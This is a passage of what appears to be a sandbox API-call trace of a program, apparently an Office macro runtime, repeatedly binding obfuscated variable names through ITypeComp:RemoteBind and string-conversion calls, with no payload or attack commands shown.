ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11e2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11e2) returned 0x0 [0060.496] CRetailMalloc_Alloc () returned 0x874fba0 [0060.496] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x56f2e7e | out: _Dst=0x874fba0) returned 0x0 [0060.497] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc20ee, cbMultiByte=17, lpWideCharStr=0x345c34, cchWideChar=18 | out: lpWideCharStr="_B_var_jJcpCZqge") returned 17 [0060.497] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_jJcpCZqge", lHashVal=0x106ec8, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.497] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f2e7e | out: _Dst=0x345c9c) returned 0x0 [0060.497] CRetailMalloc_Free () returned 0x5d60401 [0060.497] ITypeComp:RemoteBind (in: This=0x87ce890, szName="aricMQJ5d", lHashVal=0x108eb5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11e4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11e4) returned 0x0 [0060.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2ea6, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="aricMQJ5d") returned 10 [0060.497] ITypeComp:RemoteBind (in: This=0x87ce668, szName="aricMQJ5d", lHashVal=0x108eb5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11e4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11e4) returned 0x0 [0060.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2ea6, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="aricMQJ5d") returned 10 [0060.497] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="aricMQJ5d", lHashVal=0x108eb5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11e4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11e4) returned 0x0 [0060.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2ea6, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="aricMQJ5d") returned 10 [0060.498] ITypeComp:RemoteBind (in: This=0x87cef08, szName="aricMQJ5d", lHashVal=0x108eb5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11e4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11e4) returned 0x0 [0060.498] CRetailMalloc_Alloc () returned 0x874fba0 [0060.498] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x56f2ea6 | out: _Dst=0x874fba0) returned 0x0 [0060.499] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc211e, cbMultiByte=17, lpWideCharStr=0x345c34, cchWideChar=18 | out: lpWideCharStr="_B_var_aricMQJ5d") returned 17 [0060.499] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_aricMQJ5d", lHashVal=0x1097fa, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.499] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f2ea6 | out: _Dst=0x345c9c) returned 0x0 [0060.499] CRetailMalloc_Free () returned 0x5d60401 [0060.499] ITypeComp:RemoteBind (in: This=0x87ce890, szName="rWMmN", lHashVal=0x103f99, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11e6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11e6) returned 0x0 [0060.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2ece, cbMultiByte=6, lpWideCharStr=0x345c24, cchWideChar=7 | out: lpWideCharStr="rWMmN") returned 6 [0060.499] ITypeComp:RemoteBind (in: This=0x87ce668, szName="rWMmN", lHashVal=0x103f99, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11e6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11e6) returned 0x0 [0060.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2ece, cbMultiByte=6, lpWideCharStr=0x345c24, cchWideChar=7 | out: lpWideCharStr="rWMmN") returned 6 [0060.499] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="rWMmN", lHashVal=0x103f99, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11e6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11e6) returned 0x0 [0060.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2ece, cbMultiByte=6, lpWideCharStr=0x345c24, cchWideChar=7 | out: lpWideCharStr="rWMmN") returned 6 [0060.500] ITypeComp:RemoteBind (in: This=0x87cef08, szName="rWMmN", lHashVal=0x103f99, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11e6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11e6) returned 0x0 [0060.500] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.500] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x6, _Src=0x56f2ece | out: _Dst=0x87fc6e0) returned 0x0 [0060.501] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc214e, cbMultiByte=13, lpWideCharStr=0x345c34, cchWideChar=14 | out: lpWideCharStr="_B_var_rWMmN") returned 13 [0060.501] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_rWMmN", lHashVal=0x100386, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.501] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f2ece | out: _Dst=0x345c9c) returned 0x0 [0060.501] CRetailMalloc_Free () returned 0x6c80301 [0060.501] ITypeComp:RemoteBind (in: This=0x87ce890, szName="EAaIJsjb", lHashVal=0x106b3a, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11e8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11e8) returned 0x0 [0060.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2ef2, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="EAaIJsjb") returned 9 [0060.501] ITypeComp:RemoteBind (in: This=0x87ce668, szName="EAaIJsjb", lHashVal=0x106b3a, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11e8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11e8) returned 0x0 [0060.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2ef2, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="EAaIJsjb") returned 9 [0060.501] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="EAaIJsjb", lHashVal=0x106b3a, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11e8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11e8) returned 0x0 [0060.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2ef2, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="EAaIJsjb") returned 9 [0060.502] ITypeComp:RemoteBind (in: This=0x87cef08, szName="EAaIJsjb", lHashVal=0x106b3a, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11e8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11e8) returned 0x0 [0060.502] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.502] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x9, _Src=0x56f2ef2 | out: _Dst=0x87fc6e0) returned 0x0 [0060.503] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc217a, cbMultiByte=16, lpWideCharStr=0x345c34, cchWideChar=17 | out: lpWideCharStr="_B_var_EAaIJsjb") returned 16 [0060.503] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_EAaIJsjb", lHashVal=0x1042c3, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.503] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f2ef2 | out: _Dst=0x345c9c) returned 0x0 [0060.503] CRetailMalloc_Free () returned 0x6c80301 [0060.503] ITypeComp:RemoteBind (in: This=0x87ce890, szName="jl1bUw", lHashVal=0x101523, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11ea | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11ea) returned 0x0 [0060.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f1a, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="jl1bUw") returned 7 [0060.503] ITypeComp:RemoteBind (in: This=0x87ce668, szName="jl1bUw", lHashVal=0x101523, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11ea | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11ea) returned 0x0 [0060.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f1a, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="jl1bUw") returned 7 [0060.503] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="jl1bUw", lHashVal=0x101523, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11ea | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11ea) returned 0x0 [0060.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f1a, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="jl1bUw") returned 7 [0060.504] ITypeComp:RemoteBind (in: This=0x87cef08, szName="jl1bUw", lHashVal=0x101523, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11ea | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11ea) returned 0x0 [0060.504] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.504] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x7, _Src=0x56f2f1a | out: _Dst=0x87fc6e0) returned 0x0 [0060.505] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc21a6, cbMultiByte=14, lpWideCharStr=0x345c34, cchWideChar=15 | out: lpWideCharStr="_B_var_jl1bUw") returned 14 [0060.505] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_jl1bUw", lHashVal=0x108fcc, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.505] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f2f1a | out: _Dst=0x345c9c) returned 0x0 [0060.505] CRetailMalloc_Free () returned 0x6c80301 [0060.505] ITypeComp:RemoteBind (in: This=0x87ce890, szName="i06BIqLwb", lHashVal=0x10a555, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11ec | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11ec) returned 0x0 [0060.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f3e, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="i06BIqLwb") returned 10 [0060.505] ITypeComp:RemoteBind (in: This=0x87ce668, szName="i06BIqLwb", lHashVal=0x10a555, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11ec | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11ec) returned 0x0 [0060.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f3e, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="i06BIqLwb") returned 10 [0060.505] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="i06BIqLwb", lHashVal=0x10a555, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11ec | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11ec) returned 0x0 [0060.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f3e, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="i06BIqLwb") returned 10 [0060.506] ITypeComp:RemoteBind (in: This=0x87cef08, szName="i06BIqLwb", lHashVal=0x10a555, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11ec | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11ec) returned 0x0 [0060.506] CRetailMalloc_Alloc () returned 0x874fba0 [0060.506] _mbscpy_s (in: _Dst=0x874fba0, _DstSizeInBytes=0xa, _Src=0x56f2f3e | out: _Dst=0x874fba0) returned 0x0 [0060.507] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc21d2, cbMultiByte=17, lpWideCharStr=0x345c34, cchWideChar=18 | out: lpWideCharStr="_B_var_i06BIqLwb") returned 17 [0060.507] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_i06BIqLwb", lHashVal=0x10ae9a, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.507] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f2f3e | out: _Dst=0x345c9c) returned 0x0 [0060.507] CRetailMalloc_Free () returned 0x5d60401 [0060.507] ITypeComp:RemoteBind (in: This=0x87ce890, szName="r4lbxo", lHashVal=0x10f699, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11ee | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11ee) returned 0x0 [0060.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f66, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="r4lbxo") returned 7 [0060.507] ITypeComp:RemoteBind (in: This=0x87ce668, szName="r4lbxo", lHashVal=0x10f699, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11ee | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11ee) returned 0x0 [0060.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f66, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="r4lbxo") returned 7 [0060.508] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="r4lbxo", lHashVal=0x10f699, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11ee | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11ee) returned 0x0 [0060.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f66, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="r4lbxo") returned 7 [0060.508] ITypeComp:RemoteBind (in: This=0x87cef08, szName="r4lbxo", lHashVal=0x10f699, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11ee | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11ee) returned 0x0 [0060.508] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.508] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x7, _Src=0x56f2f66 | out: _Dst=0x87fc6e0) returned 0x0 [0060.509] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc2202, cbMultiByte=14, lpWideCharStr=0x345c34, cchWideChar=15 | out: lpWideCharStr="_B_var_r4lbxo") returned 14 [0060.509] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_r4lbxo", lHashVal=0x107103, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.509] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f2f66 | out: _Dst=0x345c9c) returned 0x0 [0060.509] CRetailMalloc_Free () returned 0x6c80301 [0060.509] ITypeComp:RemoteBind (in: This=0x87ce890, szName="nIedqG", lHashVal=0x1035b5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11f0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11f0) returned 0x0 [0060.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f8a, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="nIedqG") returned 7 [0060.509] ITypeComp:RemoteBind (in: This=0x87ce668, szName="nIedqG", lHashVal=0x1035b5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11f0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11f0) returned 0x0 [0060.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f8a, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="nIedqG") returned 7 [0060.510] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="nIedqG", lHashVal=0x1035b5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11f0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11f0) returned 0x0 [0060.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2f8a, cbMultiByte=7, lpWideCharStr=0x345c24, cchWideChar=8 | out: lpWideCharStr="nIedqG") returned 7 [0060.510] ITypeComp:RemoteBind (in: This=0x87cef08, szName="nIedqG", lHashVal=0x1035b5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11f0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x11f0) returned 0x0 [0060.510] CRetailMalloc_Alloc () returned 0x87fc6e0 [0060.510] _mbscpy_s (in: _Dst=0x87fc6e0, _DstSizeInBytes=0x7, _Src=0x56f2f8a | out: _Dst=0x87fc6e0) returned 0x0 [0060.511] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc222e, cbMultiByte=14, lpWideCharStr=0x345c34, cchWideChar=15 | out: lpWideCharStr="_B_var_nIedqG") returned 14 [0060.511] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_nIedqG", lHashVal=0x10b05e, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.511] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f2f8a | out: _Dst=0x345c9c) returned 0x0 [0060.511] CRetailMalloc_Free () returned 0x6c80301 [0060.511] ITypeComp:RemoteBind (in: This=0x87ce890, szName="dtsMAQE", lHashVal=0x1082b5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11f2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11f2) returned 0x0 [0060.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2fae, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="dtsMAQE") returned 8 [0060.512] ITypeComp:RemoteBind (in: This=0x87ce668, szName="dtsMAQE", lHashVal=0x1082b5, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11f2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11f2) returned 0x0 [0060.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2fae, cbMultiByte=8, lpWideCharStr=0x345c24, cchWideChar=9 | out: lpWideCharStr="dtsMAQE") returned 8 [0060.512] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="dtsMAQE", lHashVal=0x1082b5, wFlags=0x5, 